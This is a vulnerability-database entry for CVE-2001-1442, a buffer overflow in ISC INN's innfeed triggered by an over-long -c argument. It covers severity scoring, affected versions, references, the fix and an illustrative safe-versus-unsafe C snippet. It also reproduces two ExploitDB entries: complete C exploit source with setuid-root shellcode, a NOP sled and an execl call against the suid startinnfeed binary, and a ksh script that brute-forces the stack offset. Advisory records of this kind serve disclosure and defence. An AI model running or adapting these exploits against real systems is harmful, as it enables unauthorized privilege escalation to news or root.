CVE-2001-1442
CVSS 4.6
Published: 2001-04-21 00:00:00
Last revised: 2008-09-05 16:26:34

[Original] Buffer overflow in innfeed for ISC InterNetNews (INN) before 2.3.0 allows local users in the "news" group to gain privileges via a long -c command line argument.


[CNNVD] ISC InterNetNews Buffer Overflow Vulnerability (CNNVD-200104-017)

        innfeed in ISC InterNetNews (INN) before 2.3.0 contains a buffer overflow. A local user in the "news" group can gain privileges via an over-long -c command-line argument.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [reduced performance or interrupted access to resources]
Access complexity: LOW [no special conditions are needed to exploit]
Access vector: LOCAL [exploitation requires a local account or physical access]
Authentication: NONE [no authentication to the vulnerable component is required]
Note: the CVSS v2 Authentication metric counts only authentication to the vulnerable component itself; membership in the "news" group, which is what lets a user run startinnfeed, remains a precondition for exploitation.

- CPE (affected platforms and products)

cpe:/a:isc:inn:2.0    ISC INN 2.0
cpe:/a:isc:inn:2.1    ISC INN 2.1
cpe:/a:isc:inn:2.2    ISC INN 2.2
cpe:/a:isc:inn:2.2.1  ISC INN 2.2.1
cpe:/a:isc:inn:2.2.2  ISC INN 2.2.2
cpe:/a:isc:inn:2.2.3  ISC INN 2.2.3

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1442
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1442
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200104-017
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/943536
(UNKNOWN)  CERT-VN  VU#943536
http://www.securityfocus.com/bid/2620
(PATCH)  BID  2620
http://www.securityfocus.com/archive/1/178011
(PATCH)  BUGTRAQ  20010418 Re: Innfeed Buffer Overflow
http://xforce.iss.net/xforce/xfdb/6398
(UNKNOWN)  XF  innfeed-c-bo(6398)
http://securitytracker.com/id?1001353
(UNKNOWN)  SECTRACK  1001353
http://archives.neohapsis.com/archives/bugtraq/2001-04/0311.html
(UNKNOWN)  BUGTRAQ  20010418 Innfeed Buffer Overflow

- Vulnerability information

ISC InterNetNews Buffer Overflow Vulnerability
Medium severity, buffer overflow
Published 2001-04-21 00:00:00, updated 2005-10-20 00:00:00
Local
        innfeed in ISC InterNetNews (INN) before 2.3.0 contains a buffer overflow. A local user in the "news" group can gain privileges via an over-long -c command-line argument.

- Advisory and patches

        ISC recommends that users upgrade INN to 2.3.0, which features a rewritten startinnfeed utility.
        INN 2.3.1 is available as the fix for the following affected releases:
        ISC INN 2.0
        ISC INN 2.1
        ISC INN 2.2
        ISC INN 2.2.1
        ISC INN 2.2.2
        ISC INN 2.2.3

- Vulnerability information (20777)

ISC INN 2.x Command-Line Buffer Overflow Vulnerability (1) (EDBID:20777)
linux local
2001-04-18 Verified
Author: Enrique A.
source: http://www.securityfocus.com/bid/2620/info

The innfeed utility, part of ISC InterNetNews, has an exploitable buffer overflow in its command-line parser. Specifically, innfeed will overflow if an overly long -c option is passed to it.

A local attacker in the news group could use this overflow to execute arbitrary code with an effective user id of news. That is an elevation of privilege in itself, and it also gives the ability to alter news-owned binaries that may later be run by root.

Exploits are available against x86 Linux builds of innfeed.
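The bug class described above, as an added editorial illustration (this is not INN's innfeed source and does not reproduce its real parsing code): a fixed-size stack buffer filled by an unbounded copy of the -c value, beside a bounded version that refuses any value that does not fit, and a probe that finds the exact length at which acceptance stops. The buffer size CONFIG_MAX, the function names and the hand-rolled argv walk are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Editorial example for CVE-2001-1442. NOT INN's innfeed code: the
 * buffer size, function names and option handling are assumptions.
 */
#define CONFIG_MAX 256          /* assumed size of the fixed stack buffer */

/* Vulnerable pattern: the option value is copied into a fixed stack
 * buffer with no length check. A value of CONFIG_MAX bytes or more runs
 * past the buffer and, on a 2001-era x86 stack, over the saved return
 * address. Kept only for comparison; never feed it untrusted input. */
static void set_config_unsafe(const char *arg)
{
    char config[CONFIG_MAX];
    strcpy(config, arg);              /* no bound: this is the overflow */
    printf("config file: %s\n", config);
}

/* Hardened form: decide before copying whether the value, including its
 * terminating NUL, fits; reject it otherwise. */
static int set_config_safe(const char *arg, char *out, size_t outlen)
{
    size_t n = strlen(arg);
    if (n >= outlen)                  /* outlen-1 is the longest legal value */
        return -1;
    memcpy(out, arg, n + 1);
    return 0;
}

/* Minimal argv walk for "-c <file>". getopt is avoided on purpose so the
 * function can be called repeatedly without resetting optind.
 * Returns 0 on success, -1 for a missing or over-long -c value. */
static int parse_args(int argc, char **argv, char *config, size_t configlen)
{
    config[0] = '\0';
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-c") == 0) {
            if (i + 1 >= argc)
                return -1;            /* "-c" with no value */
            if (set_config_safe(argv[++i], config, configlen) != 0)
                return -1;            /* would have overflowed the unsafe form */
        }
    }
    return 0;
}

/* Boundary probe: does parse_args accept a -c value of exactly n bytes?
 * Returns 1 if accepted, 0 if rejected, -1 on allocation failure. */
static int accepts_length(size_t n)
{
    char config[CONFIG_MAX];
    char *arg = malloc(n + 1);
    if (arg == NULL)
        return -1;
    memset(arg, 'A', n);              /* constructed over-long argument */
    arg[n] = '\0';
    char *argv[] = { "innfeed", "-c", arg, NULL };
    int rc = parse_args(3, argv, config, sizeof config);
    free(arg);
    return rc == 0;
}

int main(void)
{
    char config[CONFIG_MAX];
    char *argv[] = { "innfeed", "-c", "/etc/news/innfeed.conf", NULL };

    printf("short -c value: rc=%d config=%s\n",
           parse_args(3, argv, config, sizeof config), config);
    printf("%d-byte value accepted: %d\n", CONFIG_MAX - 1, accepts_length(CONFIG_MAX - 1));
    printf("%d-byte value accepted: %d\n", CONFIG_MAX, accepts_length(CONFIG_MAX));
    set_config_unsafe("/etc/news/innfeed.conf");   /* harmless only because the value is short */
    return 0;
}
```

Build with cc -std=c99 and run: the probe accepts 255 bytes and rejects 256, the first length at which the unbounded copy would have clobbered the byte after the buffer. The check is length-before-copy, which is the only ordering that helps; a check after strcpy is already too late. ISC's own remedy went further than the copy: INN 2.3.0 shipped a rewritten startinnfeed, the setuid entry point through which the argument reaches innfeed in the first place.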

/*
  x-innfeed.c

  Buffer overflow in innfeed being called from startinnfeed renders
uid(news) gid(news), startinnfeed is suid root so I have to also check
if I can manage to get root out of this ....

  Enrique A. Sanchez Montellano
  (@defcom.com ... Yes is only @defcom.com)

  Build notes: i386 only. The inline asm and the 32-bit stack addresses
  assume a 32-bit build (gcc -m32). Select the target layout with
  -DREDHAT (also Mandrake) or -DSLACKWARE; REDHAT is the default when
  neither is given.
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define OFFSET  0
#define ALIGN   0
#define BUFFER  470

// MANDRAKE, REDHAT, etc....

#if !defined(REDHAT) && !defined(SLACKWARE)
#define REDHAT
#endif

#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
//static char shellcode[]=
//"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
             "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
             "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#endif

#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
static char shellcode[]=
"\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif

/* Current %esp: the guessed return address is taken relative to it
   (i386 only). */
unsigned long get_sp(void) {
  unsigned long sp;
  __asm__("movl %%esp, %0" : "=r"(sp));
  return sp;
}

void usage(char *name) {
  printf("Usage: %s <offset> <align> <buffer>\n", name);
  printf("Defcom Labs @ Spain ...\n");
  printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
  exit(0);
}

int main(int argc, char **argv) {
  char *code;
  int offset = OFFSET;
  int align = ALIGN;
  int buffer = BUFFER;
  unsigned long addr;
  int i;

  if(argc > 1) offset = atoi(argv[1]);
  if(argc > 2) align = atoi(argv[2]);
  if(argc > 3) buffer = atoi(argv[3]);

  /* the shellcode, two address words and the alignment must fit */
  if(buffer < (int)strlen(shellcode) + 8 + align) usage(argv[0]);

  /* +4: slack for the last 4-byte store below, and room for the NUL
     that makes this a valid argv string */
  code = (char *)malloc(buffer + 4);
  if(code == NULL) { perror("malloc"); exit(1); }

  printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
  printf("------------------------------------------------------------\n");
  printf("[ + ] Found by: \n\n[ + ] Alex Hernandez (alex.hernandez@defcom.com) \n"
         "[ + ] Enrique Sanchez (@defcom.com ... Yes is just @defcom.com)\n");
  printf("[ + ] Defcom Labs @ Spain ....\n");
  printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");

  addr = get_sp() - offset;

  printf("[ + ] Using address 0x%lx\n", addr);

  /* NOP sled over the whole argument */
  for(i = 0; i < buffer; i += 4) {
   *(long *)&code[i] = 0x90909090;
  }

  /* guessed return address in the last two words, shellcode just below */
  *(long *)&code[buffer - 4] = addr;
  *(long *)&code[buffer - 8] = addr;

  memcpy(code + buffer - strlen(shellcode) -8 - align, shellcode,
strlen(shellcode));
  code[buffer] = '\0';

  printf("[ + ] Starting exploitation ... \n\n");

  // REDHAT, MANDRAKE ...
#ifdef REDHAT
  execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif

  // SLACKWARE
#ifdef SLACKWARE
  execl("/usr/lib/news/bin/startinnfeed",
"/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif

  perror("execl");
  return 1;
}

- Vulnerability information (20778)

ISC INN 2.x Command-Line Buffer Overflow Vulnerability (2) (EDBID:20778)
linux local
2001-04-18 Verified
Author: Enrique A.
source: http://www.securityfocus.com/bid/2620/info
 
(Description identical to entry 20777 above.)

#!/bin/ksh
# Offset brute-forcer: runs the compiled exploit (expected at
# ./x-startinnfeed) with every stack offset from -2000 up to 12000
# until one guess lands in the NOP sled and the shell comes up.
L=-2000
O=40            # unused in the script as posted
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 1`
./x-startinnfeed $L
done

- Vulnerability information

19132
INN innfeed -c Parameter Local Overflow
Local Access Required; Input Manipulation
Loss of Integrity; Upgrade
Exploit Public; Third-party Verified

- Vulnerability description

- Timeline

2001-04-18 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.3.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Note that the CVE text and ISC's advisory above name 2.3.0, the release with the rewritten startinnfeed, as the first fixed version; 2.3.1 was the release available at the time of the advisory.

- Related references

- Vulnerability author

Unknown or Incomplete